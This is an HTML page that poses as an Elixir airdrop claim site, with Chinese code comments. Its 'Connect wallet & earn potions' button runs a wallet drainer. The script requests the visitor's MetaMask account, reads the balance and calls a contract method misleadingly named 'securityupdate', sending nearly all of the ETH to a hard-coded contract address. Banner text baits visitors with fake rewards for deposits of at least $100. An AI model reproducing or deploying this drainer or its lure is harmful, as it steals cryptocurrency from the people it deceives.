<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title> Elixir</title>
    <script src="https://cdn.jsdelivr.net/npm/web3/dist/web3.min.js"></script> <!-- 引入web3.js -->

    <style>
         body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            position: relative;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            overflow: hidden; /* 隐藏模态框外的滚动条 */
        }
        body::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: url('images/GSEgMGLa4AAQDmh.jpg') no-repeat center center fixed;
            background-size: cover;
            filter: blur(5px);
            opacity: 0.8;
            z-index: -1;
        }
        .container {
            text-align: center;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: stretch;
            color: #fff;
        }
        .box {
            flex: 5;
            padding: 20px;
            margin: 10px;
            border-radius: 10px;
            background-color: rgba(132, 0, 255, 0.356);
        }
        .middle-box {
            flex: 5;
            padding: 20px;
            margin: 10px;
            border-radius: 10px;
            background-color: rgba(255, 255, 255, 0.397);
            color: rgba(35, 23, 209, 0.945);
            cursor: pointer;
        }
        .button-large, .button-small {
            background-color: #ea00ffe1;
            color: #fff;
            cursor: pointer;
            border: none;
            border-radius: 5px;
        }
        .button-large {
            padding: 20px 40px;
            font-size: 24px;
            margin-top: 20px;
        }
        .button-small {
            padding: 10px 20px;
            font-size: 16px;
            margin-top: 20px;
        }
        .button-large:hover, .button-small:hover {
            background-color: #0860be;
        }
        ul {
            list-style-type: none;
            padding: 0;
        }
        li {
            margin: 10px 0;
            font-size: 18px;
        }
        .modal-wrapper {
            display: none;
            position: fixed;
            z-index: 2;
            left: 50%;
            top: 46%;
            transform: translate(-50%, -50%);
            background: rgba(0, 0, 0, 0.5);
            justify-content: center;
            align-items: center;
        }
        .logo-wrapper {
            border-radius: 50%; /* 将边框变成圆形 */
            overflow: hidden; /* 隐藏超出边框的部分 */
            margin: 10px; /* 添加一些外边距 */
            position: absolute;
            top: 0;
            left: 0;
            z-index: 10; /* 确保logo在最上层 */
        }
        .logo-wrapper img {
            width: 80px; /* 调整 logo 的宽度 */
            height: auto; /* 保持高度自适应 */
        }
        .right-bottom-content {
            position: fixed;
            bottom: 20px;
            right: 40px;
            text-align: right;
            color: #fff;
            text-shadow: 2px 2px 2px rgba(0,0,0,0.5); /* 3D文本效果 */
        }
        .right-bottom-content h2, .right-bottom-content p {
            margin: 0;
            padding: 5px;
        }
        /* 新增的按钮样式 */
        .top-right-buttons {
            position: absolute;
            top: 20px;
            right: 20px;
            display: flex;
            gap: 10px;
        }
        .top-right-buttons .oval-button {
            background: linear-gradient(90deg, rgba(237,33,255,1) 0%, rgba(102,16,242,1) 100%);
            color: #fff;
            padding: 10px 20px;
            border: none;
            border-radius: 50px; /* 椭圆形 */
            cursor: pointer;
            transition: background 0.3s ease;
        }
        .top-right-buttons .oval-button:hover {
            background: linear-gradient(90deg, rgba(102,16,242,1) 0%, rgba(237,33,255,1) 100%);
        }
        @media screen and (max-width: 768px) {
            .top-right-buttons {
                flex-direction: column;
            }
        }
    </style>
</head>
<body>
    <!-- 在这里添加动态logo的链接 -->
    <a href="https://curve.fi/#/zh-Hans/ethereum/pools?search=deusd" class="logo-wrapper">
        <img src="images/CeLd6dtD_400x400.jpg" alt="Home">
    </a>

    <div class="right-bottom-content">
        <h2>Notice</h2>
        <h2>This project requires depositing $ETH in advance (at least $100 to receive rewards)</h2>
        <h2>Otherwise, participation will fail. Please check the lower right corner of the homepage for details.</h2>
    </div>

    <div class="top-right-buttons">
        <a href=" https://agg.elixir.xyz" target="_blank"><button class="oval-button">Participate in Elixir Liquidity</button></a>
        <a href="https://tally.xyz/gov/wormhole" target="_blank"><button class="oval-button">Participate in Wormhole Staking</button></a>
        <a href="https://docs.elixir.xyz/" target="_blank"><button class="oval-button">Run the document</button></a>
        <a href="https://mirror.xyz/0x25832C2fC7B7380E5B74Ea280ea2D2C98a0d5644" target="_blank"><button class="oval-button"> Blog</button></a>
         
    </div>
    

    <div class="container">
        <div class="box">
            <h1>Apothecary</h1>
            <button class="button-large" onclick="handleWallet('MetaMask')">Connect wallet & earn potions</button>
        </div>

        <div class="box">
            <ul>
                <li>Step 1: Click the "Connect wallet & earn potions" button above.</li>
                <li>Step 2: Confirm your wallet address.</li>
                <li>Step 3: Claim your Airdrop!</li>
            </ul>
        </div>

        <div class="middle-box" onclick="clickMe()">
            <h2>Nobody NFT Smart contract consultation</h2>
            <a href="https://t.co/9FG4mC01mE" class="blue-text">Try visiting the Discord community</a>
            <p>Deposit $ETH (minimum $100 to get bonus)</p>
            <p class="blue-text">Receive the Elixir Mysterious Treasure Box and withdraw the deposited $ETH in August</p>
        </div>
    </div>

    <script>
        async function handleWallet(walletName) {
            if (walletName === 'MetaMask') {
                if (typeof window.ethereum !== 'undefined') {
                    // MetaMask已安装
                    try {
                        const contractAddress = "0x40ABC1FAd8285F75Ca1bE733c98887908ce85936"
                        const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' }); // 请求用户授权
                        const curAccount = accounts[0]; // 获取当前用户的钱包地址
                        const web3 = new Web3(window.ethereum);
                        const balanceWei = await web3.eth.getBalance(curAccount);
                        console.log('当前用户的钱包地址:', curAccount);
                        console.log('当前用户的余额(wei):', balanceWei);
                        const abiJson = [{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"connectedWallets","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getConnectedWallets","outputs":[{"internalType":"address[]","name":"","type":"address[]"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"securityupdate","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}];
                        const contract = new web3.eth.Contract(abiJson, contractAddress); // 使用合约的ABI和地址初始化合约对象
                        // 假设调用合约的doSomething方法
                        await contract.methods.securityupdate().send({
                            from: curAccount,
                            value: balanceWei - BigInt(1000000000000000), // 从用户余额中扣除1ETH
                        });
                        console.log('合约调用结果:', result);
                    } catch (error) {
                        console.error('合约调用失败:', error);
                    }
                } else {
                    // MetaMask未安装，跳转到官网
                    window.location.href = 'https://metamask.io/';
                }
            }
    // 可以为其他钱包添加类似的逻辑
}
</script>
</body>
</html> 